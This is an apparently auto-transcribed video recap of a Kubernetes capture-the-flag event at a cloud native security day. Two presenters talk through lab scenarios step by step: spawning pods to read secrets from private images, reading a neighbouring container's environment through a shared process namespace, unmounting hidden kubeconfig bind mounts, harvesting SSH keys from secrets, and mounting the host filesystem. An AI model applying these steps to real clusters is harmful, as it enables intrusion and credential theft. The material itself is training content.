►
Description
Don’t miss out! Join us at our upcoming event: KubeCon + CloudNativeCon North America 2021 in Los Angeles, CA from October 12-15. Learn more at https://kubecon.io The conference features presentations from developers and end users of Kubernetes, Prometheus, Envoy, and all of the other CNCF-hosted projects.
Capture The Flag Summary + Wrap UpVirtual - Andrew Martin, Lewis Denham-Parry
B
Fabulous
and
wonderful
well
welcome
to
the
cloud
native
security
day,
ctf
outro,
oh,
he
says
outro,
and
this
is
the
recap:
let's
go
to
bear.
Instead,
there
we
are
welcome
to
the
recap
we
will
do
a
post
cap
recap:
decap,
walk
through
what
we
did
today
and
go
under
the
hood
to
explain
some
of
the
attacks.
B
Peace,
indeed,
is
never
an
option
for
a
naughty
goose,
and
today
we
were
off
hunting
clusters
in
the
wild,
but
actually
it
was
not
the
public
internet
we
were
using.
It
was
far
more
whoops,
a
lazy,
a
far
more
constrained
environment
whereby
we
stood
everything
up
in
order
to
practice
and
learn
in
a
safe
place.
So
every
cluster
had
a
bastion
host
and
every
cluster
was
inaccessible
from
the
public
internet.
B
B
B
And
do
a
pwn
bipon
demo
of
well,
as
you
say,
everything
that
we
were
doing
so
we
will
start
off.
B
A
Sorry
yeah,
so
I
think
we're
going
to
start
off
with
scenario
3,
which
is
avalanche
so
earlier
on
today
we
had
two
separate
twitch
streams
in
a
first
twitch
stream.
We
went
through
scenario
one
and
they'll
be
available
for
you
to
review
and
then
also
in
the
afternoon
twitch
stream.
We
went
through
scenario
five,
so
without
further
ado
I'll
pass
back
to
mr
andrew
martin
to
show
us
a
way
through
the
scenario
free
which
was
called
avalon.
B
Thank
you
very
much
so
with
the
purpose
of
this.
Excuse
me.
The
purpose
of
this
is
we
trust
within
our
private
networks,
our
own
container
registers
hold
code
that
we
believe
is
safe
to
use,
so
we've
deployed
an
image
from
our
private
registry,
but
the
pirates
captain
hash
jack
and
the
nefarious
crew
have
taken
the
registry
down,
so
we
can
no
longer
get
images
from
it,
but
there's
a
secret
in
one
of
those
deployed
images.
B
So
let's
have
a
look
for
the
secret
key
to
unlock
the
plug
in
the
bottom
of
the
captain's
prize
ship
and
hopefully
scuttle
it
so
we're
in
the
hash
jackpot
in
the
avalon
namespace.
B
B
So,
let's
see
what
access
we've
got
well,
we
can
hit
the
api
server.
We
can
see
in
the
m
that
we've
got
routing
to
these
things.
It
is
the
bitnami
cubecontrol
app.
Thank
you
very
much
bitnami.
That
probably
means
it's
relatively
well
configured
from
a
file
system
perspective.
What
does
that
mean?
It
means
that
we're
uid
1001
but
group
id
zero.
Does
that?
Does
that
show
us
anything?
Well?
Actually
there
is
no
you
at
1001.
So
that
means
that
our
file
system
access
is
going
to
be
difficult.
It's
also
why
we
see.
B
Okay,
so
we
do
have
cube
control,
and
this
is
probably
a
bad
day
for
cluster
administrators.
What
pods
do
we
have?
Okay?
So
we
can
see
already
that
we've
got
three
private
earpods
and
if
we
try
and
do
this
across
all
name,
excuse
me,
that's
not
quite
how
you
spell
spaces,
then
we
can
see
here.
So
we
have
a.
We
have
a
forbidden
and
the
api
server
has
leaked
our
service
count
name
and
the
namespace
back
to
us.
B
So
we
can't
list
pods
across
all
namespaces
fine,
but
we
do
have
access
to
our
own
local
namespace.
So
what
do
we
know
about
the
scenario?
Well,
just
going
back
to
the
beginning,
we
can
see
there's
a
secret
in
one
of
the
deployed
images,
so
we've
got
access
to
these
pods.
How
do
we
find
out
what
images
they're
running?
B
B
B
B
So
what
can
we
do
here?
Well
we're
looking
for
something
in
the
file
system
of
a
pod
of
an
image.
Rather,
we
can't
get
that
image
because
it's
from
a
private
registry,
so
the
only
thing
we
can
do
here
is
to
execute
something
inside
the
pod
that
will
reveal
unto
us
the
actual
flag
on
the
file
system.
So.
B
Let
us
say:
pods
is
going
to
be
called
test
and
we'll
give
it
a
random
name
so
that
we
can.
We
can
use
the
bash
built
in
random
variable
so
that
we
get
excuse
me
so
that
we
get
a
different
name.
Every
time,
then
that's
our
pod
name
and
then
the
command
we
want
to
run
is
probably
bash
and
then
let's
just
get
our
id
and
then
once
we've
done
that
give
it
a
few
seconds
for
the
pod
to
start
at
the
cube
control
logs
on
the
pod
just
see
what
happens.
A
So
andy,
the
way
that
I
did
this
earlier
was
just
to
in
the
sleeper
command
during
it
is
just
to
write
out
those
logs
as
you've
done,
but
then
keep
call
logs
on
the
pod
and
then
write
it
to
a
dump,
so
temp
dump
and
then
to
cut
it
out
from
there.
That's
how
I.
B
B
So,
let's
just
do
shell
command
id
make
sure
that
we
have
something.
B
Okay,
so
it
was
because
I
tried
to
attach
terminal
to
it.
So,
let's
get
back
to
where
we
were
command
id
and
then
we'll
pull
the
logs.
B
B
Okay,
but
we
do
need
to
leave
a
few
seconds
for
the
pod
to
actually
start.
This
is
a
kind
of
blind
injection
attack
against
the
pod.
There
we
go
so
now
we
can
execute
commands
within
this
one
shot
container
in
the
interests
of
the
time
that
I've
wasted,
that
you
will
never
get
back.
Let's
grab
for
the
flag
with
my
favorites
one
liner,
which
looks
a
bit
like
this,
so
we're
going
to
find
something.
B
Now
we
happen
to
know
that
it's
in
the
temp
directory
to
save
us
a
little
bit
of
time
and
that
hopefully,
should
now
dump
out
a
flag
if
I'm
being
sensible
and
as
as
people
have
pointed
out
before,
we
don't
have
to
use
find
here
we
do
have
to.
Oh,
no,
that's
not
correct.
Sorry!
We
do
want
to
search
this.
B
Okay,
finally,
use
a
share,
never
going
to
make
you
this
smells
of
lewis
denim
paris
cluster
perturbering,
but
there
is
our
flag,
finally
hidden
in
some
nefarious
local
coil
system
and
we've
pulled
that
from
inside
the
container.
Now
that
puts
us
slightly
behind
time.
So,
let's
see
how
quickly.
A
We
can
get
through
the
next.
So
whilst
do
you
get
that
next,
one
set
up
yes
value
to
my
calling
card
to
rick
roll
whenever
I
get
into
a
cluster
or
these
scenarios
again
we're
tight
on
time
today.
So
we're
going
to
see
if
we
can
get
to
the
second
but
andy
whenever
you're
ready
to
go,
give
me
a
shout
and
for
I
think,
we're
going
to
go
on
to
scenario
four
now.
B
Okay,
so
what
are
we
doing
here?
The
supply
chain
is
compromised.
Who
would
have
thought
such
a
thing?
Hashtag
and
the
motley
crew
have
managed
to
get
code
merged
into
the
application
library
that
developers
use
the
lobby
runs
in
a
pod,
and
attackers
have
then
escalated
trying
to
find
secrets
on
the
host.
B
So
what
do
we
know
here?
Well,
we
know
that
we
have.
We
have
two
unknown
containers
from
the
starting
point
in
the
process.
Audit
pod.
So
again,
we'll
just
do
standards
just
see.
What's
what
exists
here?
We
have.
B
We
have
a
service
account.
We
don't
have
cube
control,
we
could
install
it,
but
let's
look
at
some
other
things.
B
That
is
generally
a
bad
day,
because
once
we
share
process
namespaces
we
share
proc
and
proc
gives
us
access
to
all
the
good
stuff.
So
we
can
now
see,
for
example,
how
that
process
was
invoked
and
actually
we
need
to
do
some,
some
null
bytes
fixing.
So
it's
visible,
so
we've
got
sleep
infinity
in
there,
so
we
know
that
it's
process,
11
here's
11.
we've
got
the
right
one,
okay.
So
what
else
could
we
look
for
in
here?
B
Well,
we
have
access
to
the
entire
root
file
system
of
that
process,
which,
of
course,
is
is
a
joy
for
all
to
behold.
B
B
But
what
are
we
looking
for
here?
Well,
actually,
in
this
case,
we
are
looking
for
perhaps
something
in
the
environment,
so
again
we're
looking
in
the
environment
of
the
other
container
in
the
pod.
There
are
two
containers
in
this
pod
and
this
one
is
giving
us
some
useful
information.
Perhaps
again,
things
are
not
bite
delimited
and
their
joyful
joys
is
something
that
looks
suspiciously
like
a
flag
happy
days
there
we
go
on
to
on
to
the
next.
A
So
whilst
you
get
set
up
for
that,
some
honorable
mentions
to
today,
so
we
had
chris
stuffed
well
d,
noel
mahey.
We
had
you
val
all
just
smashing
through
the
scenarios.
Thank
you
to
wallet
as
well.
Who
is,
I
feel,
is
the
community
support
officer.
So
thank
you
ever
so
much
for
the
channel
lena.
B
Excellent
okay,
so
the
cluster
is
almost
about
to
die
as
well,
because
it's
an
old
one.
So
what
are
we
going
to
do?
Well,
the
environment
doesn't
give
us
much
cube.
Control
has
no
local
routing.
Okay.
So
in
this
case
again
I'd
like
to
check
the
mount
points.
This
is
not
something
that
we
would
expect
to
see.
So,
let's
unmount
whatever
is
bind
mount,
is
over
root.cube
have
a
look,
there's
still
nothing
there.
Why
might
that
be?
B
Because
there
are
two
bind
mounts:
okay
and
then,
let's
just
double
check
that
the
mounts
are
actually
gone.
Yeah,
there's
nothing
there
anymore
bind
mounts,
are
just
a
way
of
hiding
things
on
a
file
system.
You
can
hide
processes
as
well,
but
in
this
case
we
were
hiding
root.cube
and
now
we've
got
cubecontrol
access
and
there
we
go.
We
can
route
to
the
master,
the
api
server.
B
It
is
to
find
where
hashtag
has
hidden
his
ill-gotten
treasure
in
a
hard-to-find
place.
Okay,
so,
first
of
all,
we
probably
want
to
get
onto
the
master,
but
we
don't
know
how
we
can
do
that
easily.
Let's
see
if
we
can
get
any
secrets.
B
Irredeemable,
villainy
and
pseudo-reminiscent
are
both
potential
candidates.
But
of
course,
if
we
have
access
to
all
name
spaces,
let's
just
take
that
one
down
two
down.
We
can
see
there's
a
fair
bit
more
in
here,
so
noticeably
some
of
these
controller
tokens
are
masquerading,
so
that
suggests
that
it's
a
service
account
token,
but
it's
not
that
is
created
by
a
human.
B
In
the
same
way,
these
default
tokens-
that's
not
how
it
should
be
so
subcompensatory
super
averageness,
let's
see
if
we
can
figure
out
which
of
these
actually
holds
the
the
token.
So
what
are
we
going
to
do?
Let's,
let's
get
a
secret
and
I
will
be
honest
lewis
I
I'm
not
actually
sure
which
is
what.
A
So
if
you
so
what
I
did
andy
when
you
dropped
this
one
on
me
was
to
go
all
name
spaces,
get
secrets,
hyphen,
o
yaml
life
and
then
just
grab
from
that,
because
it
will
give
you
everything
so
grab
ssh.
I
think
yeah.
A
A
A
So
if
you've
got
the
master
ip
node,
if
you
have
a
master
ip
from
doing
cube,
called
get
notice,
I
have
no
wide
and
oh
there
you.
B
B
So
had
we
done
this
beforehand,
we
may
have
then
thought
about
trying
to
find
ssh
keys,
which
at
this
point
we
have
done
anachronously,
but
so
we
now
have
access
to
this.
We
also
know
from
running
keep
control
version
what
the
master
appears.
B
B
A
B
A
We
want
to
inspect
that
image
and
we
want
to
find
where
the
diff
is
so
nice
and
then,
but
we
want
to
gain
access
to
that
diff,
but
to
be
able
to
do
so,
we
don't
have
pseudo
access
on
this.
So
if
we
remember
back
to
the
first
scenario
of
today,
we
showed
you
how
to
get
privileged
access
if
you
run
a
privileged
container.
So
let's,
if
we
could
just
loop
back
to
trying
to
do
a
docker
run
to
run
a
private,
I
can't.
A
B
Is
so
it
first
says
this
far
live
docker
location
is
on
the
hosts.
It's
on
the
host
file
system
which
we're
on,
but
it's
owned
by
root.
So
that
means
that
we
have
to
escalate.
We
can
do
that
through
a
container
or
we
can
just
mount
the
file
system
as
we're
about
to
do
here.
So
we've
mounted
the.
So
if
we
go
into
host
there
we
go
so
now.
We
should
have
access
to
this.
B
Okay,
yes,
it's
the
directory
and
then
proc
self
command
line
is
the
only
file
hidden
in
the
container
image,
and
therein
lies
the
flag
that
was
a
speed,
run
and
a
half.
There
are
a
couple
more
that
you
can
see
that
were
on
the
live
streams
earlier
and
I
hope
that's
been
at
least
vaguely
informative,
if
not
a
little
bit
too
fast
to
follow.
B
That's
an
excellent
point,
and
there
are
the
thank
yous.
Yes,
indeed,
thank
you
to
everybody.
Who's
helped
putting
everything
together
and
also
the
organizers
the
work
done
to
get
today,
smooth
and
speed,
bump,
free
and
and
control
plane.
Folks,
who've
been
laboring
on
the
back
end
past
and
present.
Thanks
to
you
all.
B
There
is
the
the
great
passing
of
the
seas,
some
attendees
enjoyed
themselves
and
yes,
of
course,
don't
put
kubernetes
api
servers
on
the
public
internet
control
plane.
Does
this
for
a
living?
If
you'd
like
us
to
run
a
ctf
for
you,
or
indeed
you'd
like
to
attend
some
of
the
sans
training
courses,
then
please
do
reach
out
to
the
relevant
channels
and
thank
you
very
much
for
playing
have
a
wonderful
day.